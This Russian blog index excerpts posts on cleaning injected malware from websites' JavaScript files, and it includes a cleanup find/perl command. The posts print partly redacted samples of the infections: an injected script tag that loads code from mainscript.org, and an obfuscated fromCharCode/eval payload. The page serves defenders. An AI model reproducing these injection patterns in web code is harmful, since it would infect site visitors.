yandex

Сибирь. Сабынич. Айти

о природе, личной жизни и информационных технологиях

Заражение js-скриптов

UPD 01.03.2013: Я закрыл возможность комментирования данной записи. Все вопросы по данной теме задавайте на https://ask.sabini.ch. Благодарю за понимание. Сегодня был свиделем следующего внедрения вредосного кода в js-файлы. Путь попадания все тот же – ftp. function g(){ <..часть кода удалено..> var e=new Date <..часть кода удалено..> etTime()+(2592000000)); if(!g()&&windo <..часть когда удалено..> src=”http://mainscript.org/mainscript.js”></script>’);} Не совсем уверен в красивости […]

Вирусы на сайте. Продолжение. Новый паттерн

Найден новый паттерн. Заражаются все .js-файлы try{q=document.createElement(“d”+”i”+”v”);q.appendChild(q+””);}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz=’al’;zz=’zv’.substr(123-122)+zz;ss=[];f=’fr’+’om’+’Ch’;f+=’arC’;f+=’ode’;w=this;e=w[f[“substr”](11)+zz];n=”19$50$57.5$ <часть кода убрана> 9.5$19$19.5$28.5″[((e)?”s”:””)+”p”+”lit”](“a$”[((e)?”su”:””)+”bstr”](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} Выкусывается командой: find ./ -type f -name “*.js” -exec perl -pi -e ‘s/try\{q=documen.*q=ss;e\(q\)//g”’ ‘{}’ \; Не забываем перед операцией делать резервную копию директории/сайта.

Вирусы на сайте. Поиск и удаление кода.

Тема появления вредоносного кода на страницах сайта очень популярная. Хотел в заголовке добавить “Часть 1”, но потом решил сделать в виде бесконечной истории =) Как уже все должно быть известно, нередко (я бы даже сказал, в большинстве случаев) пользователи сами становятся носителями инфекции (в ботнет-среде таких называют “зомби”). И внедрение кода может происходить следующим способом. […]

Использование сторонних хостингов JS-библиотек

Периодически начинаю осматривать различные аспекты оптимизации сайтов согласно различным сервисам, приложениям и рекомендациям. Некоторое время назад наткнулся на плагин к Joomla, который предлагал использование CDN-хостинга JS-библиотек от Google – GoogleAjaxLib1.2. К сожалению, автор давно не обновлял этот плагин и по умолчанию использовались устаревшие версии библиотек. Со своей стороны я локализовал этот плагин и изменил версии […]

Пролистать наверх